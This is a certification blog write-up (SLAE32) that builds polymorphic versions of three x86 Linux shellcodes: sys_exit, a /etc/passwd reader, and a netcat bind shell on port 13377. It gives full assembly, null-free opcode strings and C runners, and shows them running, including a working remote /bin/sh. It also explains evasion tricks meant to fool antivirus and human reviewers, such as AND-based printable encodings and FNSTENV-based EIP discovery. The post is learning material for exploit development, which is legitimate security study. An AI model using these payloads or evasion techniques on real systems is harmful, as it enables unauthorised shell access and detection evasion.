SLAE32 Assignment 6 - Polymorphic Shellcode

SLAE32

This post introduces the 6th mission to my SLAE32 journey.

If the previous assignment was cool, this one was even cooler because I could apply in the Msfvenom analysis assignment to develop polymorphic versions of existing shellcodes.

There are some existing tools, such as ADMutate, that will XOR-encrypt existing shellcode and attach loader code to it. This is definitely useful, but writing polymorphic shellcode without a tool is a much better learning experience.

Introduction

The SLAE32 6th assignment task is to select 3 shellcode payloads from shell-storm and create polymorphic versions of them without increasng the size of the shellcode by more than 50%;

Bonus points if we can make it shorter inlength compared to the original.

Shellcode 1 - sys_exit(0)

This shellcode was written by gunslinger_, and is located here. This shellcode only calls exit() with 0 as exit code.

Size: 8 bytes

/*
Name   : 8 bytes sys_exit(0) x86 linux shellcode
Date   : may, 31 2010
Author : gunslinger_
Web    : devilzc0de.com
blog   : gunslinger.devilzc0de.com
tested on : linux debian
*/

char *bye=
 "\x31\xc0"                    /* xor    %eax,%eax */
 "\xb0\x01"                    /* mov    $0x1,%al */
 "\x31\xdb"                    /* xor    %ebx,%ebx */
 "\xcd\x80";                   /* int    $0x80 */

int main(void)
{
		((void (*)(void)) bye)();
		return 0;
}

This is a short code, we have minimum alternatives to work with.

global _start

section .text
_start:

xor ebx, ebx    ; clear ebx
mul ebx         ; using mul to clear eax and edx
inc eax         ; put exit(1) syscall in eax
syscall

Checking assembler.sh output

╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/sys_exit(0)-shellcode-623/poly ‹main●› 
╰─$ ../../../../assembler.sh 7-byte-poly_sys_exit.nasm

[*] Compiling with NASM
[*] Linking
[*] Extracting opcodes
[*] Done


Shellcode size: 7

"\x31\xdb\xf7\xe3\x40\x0f\x05"

--------------------
[*] Hack the World!
--------------------

No null bytes appear in the shellcode. We are good to go and paste the shellcode to our shellcode.c program

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x31\xdb\xf7\xe3\x40\x0f\x05";

main() {

	printf("Shellcode Length: %d\n", strlen(code));
	int (*ret)() = (int(*)())code;

	ret();

}

Compiling with gcc and executing it

╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/sys_exit(0)-shellcode-623/poly ‹main●› 
╰─$ gcc -fno-stack-protector -m32 -z execstack -o shellcode shellcode.c
shellcode.c:7:1: warning: return type defaults to ‘int’ [-Wimplicit-int]
 main() {
 ^~~~

╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/sys_exit(0)-shellcode-623/poly ‹main●› 
╰─$ ./shellcode 
Shellcode Length: 7

╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/sys_exit(0)-shellcode-623/poly ‹main●› 
╰─$ echo $?
0

Size: 7 bytes

Reduced 1 byte which is less 12,5% in size compared to the original.

Shellcode 2 - cat passwd Shellcode

This shellcode was written by fb1h2s, and is located here. This shellcode will read the /etc/passwd file.

Size: 43 bytes

#include <stdio.h>
 
const char shellcode[]="\x31\xc0" // xorl %eax,%eax
"\x99" // cdq
"\x52" // push edx
"\x68\x2f\x63\x61\x74" // push dword 0x7461632f
"\x68\x2f\x62\x69\x6e" // push dword 0x6e69622f
"\x89\xe3" // mov ebx,esp
"\x52" // push edx
"\x68\x73\x73\x77\x64" // pu sh dword 0x64777373
"\x68\x2f\x2f\x70\x61" // push dword 0x61702f2f
"\x68\x2f\x65\x74\x63" // push dword 0x6374652f
"\x89\xe1" // mov ecx,esp
"\xb0\x0b" // mov $0xb,%al
"\x52" // push edx
"\x51" // push ecx
"\x53" // push ebx
"\x89\xe1" // mov ecx,esp
"\xcd\x80" ; // int 80h
 
int main()
{
(*(void (*)()) shellcode)();
 
return 0;
}
 
 
/*
shellcode[]=	"\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64" 
		"\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80";
*/

We will use the assembly comment to know what the code is doing. Appears to use some tricks we have already using in past assignment, so we’ll just add junk instructions to change a bit the code.


global _start
section .text
_start:
        mov eax, -1				; put 0xfffff in eax
        inc eax					; eax becomes zero
		cdq						; zeroes edx
        lea ebx, [esp-0xc]		;
        push edx
        push dword 0x7461632f   ; tac/
        push dword 0x6e69622f   ; nib/
        
        lea ecx, [ebx-0x10]     ; use ebx as our "stack pointer"
        
        push edx
        push dword 0x64777374   ; dwst - changes a 's' for a 't'
        push dword 0x61702f2f   ; ap//
        push dword 0x6374652f   ; cte/

        mov ax, 0x4a2f 			; using AND operation because results in printable ASCII characters

        push edx
        xor byte [esp+0xc], 0x7	; replacing 't' for a 's'
        push ecx
        push ebx
        mov ecx, esp
        and ax,0x358b      		; becomeoxb - using AND operations to resulting in nulling part of eax without null bytes
        int 0x80

From the sbeginning of the code, edx in the end becomes zero. Some instructions below we changed one letter from /etc/passwd to /etcpatswd which we replace later the t with an s.

The most cooliest trick here is teh use of AND operations to zero eax. A real cool challenge because is an alternative to XOR operations. AND logic operations assemble into printable ASCII characters range (from 0x33 to 0x7e). ``XOR` logic operations doesn’t assemble into the printable ASCII range.

Some buffers don’t allow unprintable characters. This way we can exploit what was previously unexploitable.

Let’s using an example to show how it works

ASCII Printable Polymorphic Shellcode

The AND logic table transforms bits as follows:

1 and 1 = 1
0 and 0 = 0
1 and 0 = 0
0 and 1 = 0

Because the only case where the end result is a 1 is when both bits are 1, if two inverse values are ANDed onto EAX, EAX will become zero.

Binary                                Hexadecimal
    1000101010011100100111101001010       0x454e4f4a
AND 0111010001100010011000000110101   AND 0x3a313035
------------------------------------  ---------------
    0000000000000000000000000000000       0x00000000

Using this technique two printable 32-bit values are also bitwise inverses of each other.

What’s the advantage?

eax can be zeroed without using null bytes, and the outcome is assembled machine code will be printable text.

From https://www.dmi.unipg.it/~bista/didattica/sicurezza-pg/buffer-overrun/hacking-book/0x2a0-writing_shellcode.html

Getting back to our exercise, let’s use our code to demonstrate how we leverage this technique to our purpose.

The instructions used with this technique are:

mov ax, 0x4a2f
and ax, 0x358b

The main goal is eax value becomes 0xb (execve syscall). So let’s see below why we used this values to perform the AND operation and the result of it.

Binary                    Hexadecimal
    0100 1010 0010 1111       0x4a2f
AND 0011 0101 1000 1011   AND 0x358b
-----------------------  -------------
    0000 0000 0000 1011       0x000b

This too values are the inverse of each in the higher 8 bits, but in the low 8 bits they result in 0xb, the execve syscall.

Will an antivirus or a human able to spot this by only looking at it?

Checking assembler.sh output

╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/cat_passwd-shellcode-571 ‹main●› 
╰─$ ../../../assembler.sh cat_passwd.nasm                              

[*] Compiling with NASM
[*] Linking
[*] Extracting opcodes
[*] Done


Shellcode size: 61

"\xb8\xff\xff\xff\xff\x40\x99\x8d\x5c\x24\xf4\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x8d\x4b\xf0\x52\x68\x74\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x66\xb8\x2f\x4a\x52\x80\x74\x24\x0c\x07\x51\x53\x89\xe1\x66\x25\x8b\x35\xcd\x80"

--------------------
[*] Hack the World!
--------------------

No null bytes appear in the shellcode. We are good to go and paste the shellcode to our shellcode.c program

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\xb8\xff\xff\xff\xff\x40\x99\x8d\x5c\x24\xf4\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x8d\x4b\xf0\x52\x68\x74\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x66\xb8\x2f\x4a\x52\x80\x74\x24\x0c\x07\x51\x53\x89\xe1\x66\x25\x8b\x35\xcd\x80";

main() {

	printf("Shellcode Length: %d\n", strlen(code));
	int (*ret)() = (int(*)())code;

	ret();

}

Compiling with gcc and executing it

╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/cat_passwd-shellcode-571 ‹main●› 
╰─$ gcc -fno-stack-protector -m32 -z execstack -o shellcode shellcode.c
shellcode.c:7:1: warning: return type defaults to ‘int’ [-Wimplicit-int]
 main() {
 ^~~~

╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/cat_passwd-shellcode-571 ‹main●› 
╰─$ ./shellcode 
Shellcode Length: 61
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
dnsmasq:x:105:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
usbmux:x:106:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:107:113:RealtimeKit,,,:/proc:/usr/sbin/nologin
pulse:x:108:117:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
speech-dispatcher:x:109:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
avahi:x:110:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
saned:x:111:120::/var/lib/saned:/usr/sbin/nologin
colord:x:112:121:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false
lightdm:x:114:122:Light Display Manager:/var/lib/lightdm:/bin/false
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
edu:x:1000:1000:edu:/home/edu:/usr/bin/zsh

Size: 61 bytes

Increased 41,9% which reflects in more 17 bytes.

Shellcode 3 - nc -lvve/bin/sh -p13377

This was by far the most challenging exercise I had during the course

At some point I turn it into a personal thing because I was decided to put the techniques I learned from the msfvenom shellcode analysis assignment into this exercise and nothing seems to not working at all.

One constraint that I need to bypass was the fact that I generated the msfvenoom shellcodes with null bytes.

This time I couldn’t use null bytes and that’s why I needed to review how msfvenom generates shellcode without null-bytes and tried to apply that methodology into this task.

This way I will present two polymorphic versions of this shellcode: one shellcode with null bytes and other null-free shellcode.

Then, we can compare the differences between them and reflect how hard is to develop a null-free shellcode.

The following quote tells the mindset we should have to not give up when we face a complex problem and resumes how difficult it was for me to make it working.

  Intelligence is the ability to adapt to change,
                                                by Stephen Hawking

After this, let’s get to the point.

This shellcode was written by an Anonymous user, and is located here. As the shellcode description says, this shellcode will listen on port 13377 using netcat and give /bin/sh to connecting attacker.

The original shellcode does not have any comments, so I added some to be easier to understabds its internals.

Size: 62 bytes

linux x86 nc -lvve/bin/sh -p13377 shellcode
This shellcode will listen on port 13377 using netcat and give /bin/sh to connecting attacker
Author: Anonymous
Site: http://chaossecurity.wordpress.com/
Here is code written in NASM
/////////////////////////////
section .text
    global _start
_start:
xor eax,eax
xor edx,edx
push 0x37373333	; 7733
push 0x3170762d	; 1pv-
mov edx, esp
push eax
push 0x68732f6e	; hs/n
push 0x69622f65	; ib/e
push 0x76766c2d	; vvl-
mov ecx,esp
push eax
push 0x636e2f2f	; cn//
push 0x2f2f2f2f	; ////
push 0x6e69622f	; nib/
mov ebx, esp
push eax
push edx
push ecx
push ebx
xor edx,edx
mov  ecx,esp
mov al,11		; execve syscall
int 0x80
//////////////////////////////////
And here is objdump from which you can see the shellcode
//////////////////////////////////
teo@teo-desktop ~ $ objdump -d a.out
a.out:     file format elf32-i386
Disassembly of section .text:
08048060 <.text>:
 8048060:   31 c0                   xor    %eax,%eax
 8048062:   31 d2                   xor    %edx,%edx
 8048064:   68 33 33 37 37          push   $0x37373333
 8048069:   68 2d 76 70 31          push   $0x3170762d
 804806e:   89 e2                   mov    %esp,%edx
 8048070:   50                      push   %eax
 8048071:   68 6e 2f 73 68          push   $0x68732f6e
 8048076:   68 65 2f 62 69          push   $0x69622f65
 804807b:   68 2d 6c 76 76          push   $0x76766c2d
 8048080:   89 e1                   mov    %esp,%ecx
 8048082:   50                      push   %eax
 8048083:   68 2f 2f 6e 63          push   $0x636e2f2f
 8048088:   68 2f 2f 2f 2f          push   $0x2f2f2f2f
 804808d:   68 2f 62 69 6e          push   $0x6e69622f
 8048092:   89 e3                   mov    %esp,%ebx
 8048094:   50                      push   %eax
 8048095:   52                      push   %edx
 8048096:   51                      push   %ecx
 8048097:   53                      push   %ebx
 8048098:   31 d2                   xor    %edx,%edx
 804809a:   89 e1                   mov    %esp,%ecx
 804809c:   b0 0b                   mov    $0xb,%al
 804809e:   cd 80                   int    $0x80

I said above for this exercise I had completely different approach than others.

The inspiration was the methodology used by the previous analyzed msfvenom shellcodes.

I will present first the shellcode with null bytes.

Null Byte Shellcode

xor eax, eax
cdq

call $+ 0xf
sub    eax,0x33317076
xor    esi,DWORD [edi]
aaa
add    byte [eax], al
pop edx

call $ + 0x13
sub   eax,0x6576766c
das
bound  ebp, [ecx+0x6e]
das
jae $+0x6a
add    byte [eax], al
pop ecx

call $ + 0x12
das
bound  ebp, [ecx+0x6e]
das
das
das
das
das
das
outsb
arpl word [eax],ax
pop ebx

push eax
push edx
push ecx
push ebx

mov eax, 0x454e4a2f
;add ax, 0x1000

xor edx,edx
mov  ecx,esp
and eax,0x3a31358b
int 0x80

Let’s divide and conquer one more time.

The code is divided in parts related to each argument of the command to executed by execve.

Each part is delimited by a call and a pop instruction. The isntruction inside this part are used to prepare an argument. The pop $Register instruction is used to put the address pointer of the argument from esp to the related register depending on each argument position of execve we are dealing.

4th argument - pop edx
3rd argument - pop ecx
2nd argument - pop ebx
1st argument - pop eax

So the pop instruction will tell us what execve argument we were preparing of. The same process used to execute any syscall but with obfuscated code.

For example:

xor eax, eax            
cdq                     

call $+ 0xf				; Start
sub  eax,0x33317076
xor  esi,DWORD [edi]
aaa
add  byte [eax], al
pop edx					; end

call $+0xf tells us we are looking to a “piece” of code that is preparing the 4th argument because, the end of this part is pop edx.

Between these instruction it seems that we have assembly instruction that doesn’t make any sense that will be executed by the CPU but, this is not the case.

By this time, you should be familiar with the x86 calling conventions and how call instruction behaves.

Just a reminder, the call instruction pushes the return address (address immediately after the call instruction) on the stack and it changes eip to the call destination. This effectively transfers control to the call target and begins execution there.

So what are these instructions doing exactly?

xor eax, eax            ; zeroes eax
cdq                     ; zeroes edx (saves space)

call $ + 0xf				; jumps to pop ebx
sub  eax,0x33317076
xor  esi,DWORD [edi]
aaa
add  byte [eax], al     
pop edx             	; saving execve 4th argument

Firstly, we are clearing eax and edx registers, the we use call to save next isntruction address and jump to the pop ebx instruction.

Why $ + 0xf?

Well, the $ holds the address of the current instruction. As an example, let’s use the above code and compare the disassembled output with objdump -M intel -d netcat_nullbyte_shellcode

xor eax, eax
cdq

call $+ 0xf             ; $ holds address of call opcode
sub    eax,0x33317076
xor    esi,DWORD [edi]
aaa
add    byte [eax], al
pop edx
---
08049000 <_start>:
 8049000:       31 c0                   xor    eax,eax
 8049002:       99                      cdq    
 8049003:       e8 0a 00 00 00          call   8049012 <_start+0x12>
 8049008:       2d 76 70 31 33          sub    eax,0x33317076
 804900d:       33 37                   xor    esi,DWORD PTR [edi]
 804900f:       37                      aaa    
 8049010:       00 00                   add    BYTE PTR [eax],al
 8049012:       5a                      pop    edx

Checking the opcodes (2nd column) there is as distance of 15 bytes between pop edx and the call instruction.

Look how the call instruction introduces null bytes when used when redirects execution with an instruction with a short distance.

So, we are storing the same bytes in edx as the original shellcode does. Instead of doing push instructions and put the bytes on the stack

Approach 1

; Not forget these are placed in Little-Endian format

push 0x37373333
push 0x3170762d

Approach 2

We place the exact same bytes as opcodes in the code and put the address of the first byte in edx

2d 76 70 31 33          sub    eax,0x33317076
33 77 04                xor    esi,DWORD PTR [edi+0x4]
37                      aaa
00 40 01                add    BYTE PTR [eax+0x1],al

Hex bytes: **0x2D, 0x76, 0x70, 0x31, 0x33, 0x33, 0x77, 0x04, 0x37**, 0x00

Comparing both approaches we see they have the same exact bytes. We can check this with gdb

Approach 2 opcodes

The approach 2 has the disadvantage to put null bytes because we need to specify the end of them while with approach 1 we just push a zeroed register which does have null bytes.

This is the main reason I struggled with Approach 2 and why I need to rethink and completely change my approach to avoid null bytes.

Null Byte Free Shellcode


xor eax,eax

mov al, 0x8
fnop
jmp short argParser

sub    eax,0x33317076
xor    esi,DWORD [edi]
aaa
nop                     ; nops will be changed to nulls in runtime

lea edx, [esi+4]

mov al, 0xc
fnop
jmp short argParser

sub   eax,0x6576766c    ; \xe8\x0e\x00\x00\x00
das
bound  ebp, [ecx+0x6e]
das
jae $+0x6a
nop


lea ecx, [esi+4]

;call $ + 0x12   ;\xe8\x0d\x00\x00\x00

mov al, 0xc
fnop
jmp short argParser

das
bound  ebp, [ecx+0x6e]
das
das
das
das
das
das
outsb
arpl word [eax],bx

lea ebx, [esi+4]

push eax
push edx
push ecx
push ebx

cdq             ; clear edx because is one of execve's arguments --> char *const envp[]
mov  ecx,esp
mov al, 0xb
int 0x80

argParser:          ; similar to jmp-call-pop but calls to a nop byte which can
                    ; assmuming al has the right distance
    fnstenv [esp-0xc]
    pop esi
    mov byte [esi + 0x4 + eax], ah ; null-byte decoder
    lea edi, [esi + 0x4+eax+0x1]
    xor eax,eax
    jmp edi

The approach idea is the same as the Approach 2 from the Null Byte shellcode, but this uses the fnstenv technique from the x87 FPU to store the FPU related instruction address instead of using call. This technique was mentioned during the course but it involved to research on our own to understand how we can use it.

To put the shellcode working with this technique, the logic needed to be completely redesigned.

The FNSTENV Technique

There are alternative methods in shellcode for finding the value of the EIP register using instructions that contain no null bytes. One of those methods uses an FPU instruction.

Below the image from FPU section in Intel’s manual, shows how the FPU memory organization.

FNSTENV

When FSTENV instruction is preceded by some other FPU instruction (in our case, it is fnop), then the result of the fnstenv is pushed on to the stack, and the result is none other than the address of the previous FPU instruction.

For this exercise I used fnop instruction. It can fldz or other FPU related isntruction to use this technique. just make sure to be an FPU isntruction.

PoC code with fnstenv

l1: fnop
  fnstenv [esp-0c]  ; FPU Instruction Pointer (FIP)
  pop eax
l2: ...

The result of the above two FPU instructions will be the address of fnop instruction gets saved on to the stack.

When l2 is reached, the value in the eax register will be the address of l1.

Debugging fnstenv

Debugging the code with the fnstenv technique was a complete madness to my head.

I figured out that performing single-stepping debugging over the fnop instruction results in a completely different value in the eax register. This means that the code could be altered in a very subtle way.

So, the solution was place a breakpoint in fnop and the instruction after the fnstenv. In our code is pop esi

mov al, 0x8
fnop                                ; breakpoint here
jmp short argParser
[...]
argParser:          

    fnstenv [esp-0xc]
    pop esi                         ; breakpoint here
    mov byte [esi + 0x4 + eax], ah 
    lea edi, [esi + 0x4+eax+0x1]
    xor eax,eax
    jmp edi

Between these instructions I executed the program normally to avoid the unstable behaviour fnstenv causes when performing single-step debugging.

Debug section taken from VirtualPC-specific section in https://www.virusbulletin.com/virusbulletin/2010/11/anti-unpacker-tricks-part-fourteen

Methodology

As well as the previous shellcode, the code is divided in parts related to each argument of the command to executed by execve.

This time, each part is delimited by a mov, fnop, jmp and a lea instructions. The instructions inside this part are used to prepare one of the execve’s arguments.

The mov, fnop, jmp instructions prepare the environment to store EIP address and to store the bytes in the related register to the execve argument.

The lea $REGISTER, [esi+4] instruction is used to put the address pointer of the argument from esp to the related register depending on each argument position of execve we are dealing.

So the lea instruction will tell us what execve argument we were preparing of.

Let’s take a the “piece” of code for one of the arguments from our shellcode and dig into it.

We’ll be analyzing what we put in the edx register.

; start of edx section argument
mov al, 0x8             ; distance from sub to nop
fnop                    ; FPU instruction used to store instruction pointer in FPU stack
jmp short argParser

sub    eax,0x33317076
xor    esi,DWORD [edi]
aaa
nop                     ; avoid null byte. changed in runtime to null

lea edx, [esi+4]
; end of edx section argument
;----------------------------------------
; starting preparing next argument
mov al, 0xc

[...]

argParser:          
                    
    fnstenv [esp-0xc]              ; Storing fnop address onto the stack
    pop esi                        ; put stored FIP address in esi
    mov byte [esi + 0x4 + eax], ah ; null-byte decoder --> change nop to null
    lea edi, [esi + 0x4+eax+0x1]   ; load the address of lea edx, [esi+4] instruction
    xor eax,eax                    ; zeroed eax before executing next argument section
    jmp edi                        ; jump to instruction lea edx, [esi+4]

First, we move to al the distance from the first byte of the argument to be placed in edx to the nop isntruction. We don’t consider fnop and jmp opcodes because this are always equal across every argument section, so they considered in the ArgParser branch.

We can use objdump to verify that the distance between sub eax,0x33317076 and nop is 8 bytes.


8049004:       d9 d0                   fnop
8049006:       eb 43                   jmp    804904b <argParser>
8049008:       2d 76 70 31 33          sub    eax,0x33317076
804900d:       33 37                   xor    esi,DWORD PTR [edi]
804900f:       37                      aaa
8049010:       90                      nop

0x8049010 - 0x8049008 = 0x8 bytes

Then, we execute an FPU instruction to store the fnop address in the FPU stack. This address will be the reference to our further actions. Next, we jump to the ArgParser branch.

mov al, 0x8             ; distance from sub to nop
fnop                    ; FPU instruction used to store instruction pointer in FPU stack
jmp short argParser

In this branch is where all the magic happens.

argParser:          
                    
    fnstenv [esp-0xc]              ; Storing fnop address onto the stack
    pop esi                        ; put stored FIP address in esi
    mov byte [esi + 0x4 + eax], ah ; null-byte decoder --> change nop to null
    lea edi, [esi + 0x4+eax+0x1]   ; load the address of lea edx, [esi+4] instruction
    xor eax,eax                    ; zeroed eax before executing next argument section
    jmp edi                        ; jump to instruction lea edx, [esi+4]

First we store the fnop address on the stack and put that address in esi register.

Then, remember that nop (0x90) byte we put in the end of the section argument?

We need to put a null byte in the end but we can’t put it explicitly. So we are going to change it to null byte with the following single instruction

mov byte [esi + 0x4 + eax], ah  ; ah is always zero

Basically we are moving ah which is the ax 8 most significant bits register to the address of the nop byte. We know that ah is always because in the beginning of the shellcode we have xor eax, eax and in the ArgParser branch and we just work with al in each argument section. So, ah byte is not touched during our operations.

This way a null byte is placed in the of the argument bytes marking the end of the string bytes.

Let’s demonstrate it in gdb

Null-byte decoder

After changing 0x90 to 0x00. three new instructions appeared.

Null-byte

That null-byte changed also the fnstenv instruction. What a simple thing can do, right?

After performing this operation we need to store the argument address in edx. Basically we need to jump to the lea edx, [esi+4] instruction.

The way our code is doing is by load to edi the lea address based on the esi register which holds the fnop instruction address, adding the distance from fnop to esi which was the former nop byte and adding 1 more byte to reach lea edx, [esi+4] from the fnop instruction.

lea edi, [esi + 0x4+eax+0x1]   ; load the address of lea edx, [esi+4] instruction

The most tricky is done, we just need to clear eax to prepare the next argument section and jump to put argument address in edx using edi.

xor eax,eax                    ; zeroed eax before executing next argument section
jmp edi                        ; jump to instruction lea edx, [esi+4]

Then, it is just doing the same for the other arguments.

We end our shellcode calling execve with usual process.

push eax        ; 0x0
push edx        ; -vp13377
push ecx        ; -lvve/bin/sh
push ebx        ; /bin//////nc

cdq             ; clear edx because is one of execve's arguments --> char *const envp[]
mov  ecx,esp
mov al, 0xb     ; execve syscall
int 0x80

hecking assembler.sh output

╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/netcat-shellcode-804/poly ‹main●› 
╰─$ ../../../../assembler.sh poly_netcat.nasm                                                                                                                                                                150 ↵

[*] Compiling with NASM
[*] Linking
[*] Extracting opcodes
[*] Done


Shellcode size: 92

"\x31\xc0\xb0\x08\xd9\xd0\xeb\x43\x2d\x76\x70\x31\x33\x33\x37\x37\x90\x8d\x56\x04\xb0\x0c\xd9\xd0\xeb\x31\x2d\x6c\x76\x76\x65\x2f\x62\x69\x6e\x2f\x73\x68\x90\x8d\x4e\x04\xb0\x0c\xd9\xd0\xeb\x1b\x2f\x62\x69\x6e\x2f\x2f\x2f\x2f\x2f\x2f\x6e\x63\x18\x8d\x5e\x04\x50\x52\x51\x53\x99\x89\xe1\xb0\x0b\xcd\x80\xd9\x74\x24\xf4\x5e\x88\x64\x06\x04\x8d\x7c\x30\x05\x31\xc0\xff\xe7"

--------------------
[*] Hack the World!
--------------------

No null bytes appear in the shellcode. We are good to go and paste the shellcode to our shellcode.c program

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x31\xc0\xb0\x08\xd9\xd0\xeb\x43\x2d\x76\x70\x31\x33\x33\x37\x37\x90\x8d\x56\x04\xb0\x0c\xd9\xd0"
"\xeb\x31\x2d\x6c\x76\x76\x65\x2f\x62\x69\x6e\x2f\x73\x68\x90\x8d\x4e\x04\xb0\x0c\xd9\xd0\xeb\x1b"
"\x2f\x62\x69\x6e\x2f\x2f\x2f\x2f\x2f\x2f\x6e\x63\x18\x8d\x5e\x04\x50\x52\x51\x53\x99\x89\xe1\xb0\x0b"
"\xcd\x80\xd9\x74\x24\xf4\x5e\x88\x64\x06\x04\x8d\x7c\x30\x05\x31\xc0\xff\xe7";


main() {

	printf("Shellcode Length: %d\n", strlen(code));
	int (*ret)() = (int(*)())code;

	ret();

}

Compiling with gcc and executing it

╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/netcat-shellcode-804/poly ‹main●› 
╰─$ gcc -fno-stack-protector -m32 -z execstack -o shellcode shellcode.c
shellcode.c:11:1: warning: return type defaults to ‘int’ [-Wimplicit-int]
 main() {
 ^~~~
╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/netcat-shellcode-804/poly ‹main●› 
╰─$ ./shellcode
Shellcode Length: 92
listening on [any] 13377 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 41344

-----------

╭─edu@debian ~/Desktop/slae_x86/assignments ‹main●› 
╰─$ nc -nv 127.0.0.1 13377
(UNKNOWN) [127.0.0.1] 13377 (?) open
id
uid=1000(edu) gid=1000(edu) groups=1000(edu),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),115(lpadmin),116(scanner)
ls
poly_netcat
poly_netcat.nasm
poly_netcat.o
shellcode
shellcode.c

Size: 92 bytes

After some tuning we have a 92-byte polymorphic shellcode. An increase of 28 bytes in size which corresponds to 43.75%.

A curious Note

After put to work this shellcode I checked how shikata_ga_nai encodes shellcode.

shikata_ga_nai

It appars to have some similarities to what have done :)

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: PA-31319

All the source code files are available on GitHub at https://github.com/0xnibbles/slae_x86

Introduction#

Shellcode 1 - sys_exit(0)#

Shellcode 2 - cat passwd Shellcode#

ASCII Printable Polymorphic Shellcode#

Shellcode 3 - nc -lvve/bin/sh -p13377#

Sharing some thoughts#

Null Byte Shellcode#

So what are these instructions doing exactly?#

Null Byte Free Shellcode#

The FNSTENV Technique#

Debugging fnstenv#

Methodology#

A curious Note#

Introduction

Shellcode 1 - sys_exit(0)

Shellcode 2 - cat passwd Shellcode

ASCII Printable Polymorphic Shellcode

Shellcode 3 - nc -lvve/bin/sh -p13377

Sharing some thoughts

Null Byte Shellcode

So what are these instructions doing exactly?

Null Byte Free Shellcode

The FNSTENV Technique

Debugging fnstenv

Methodology

A curious Note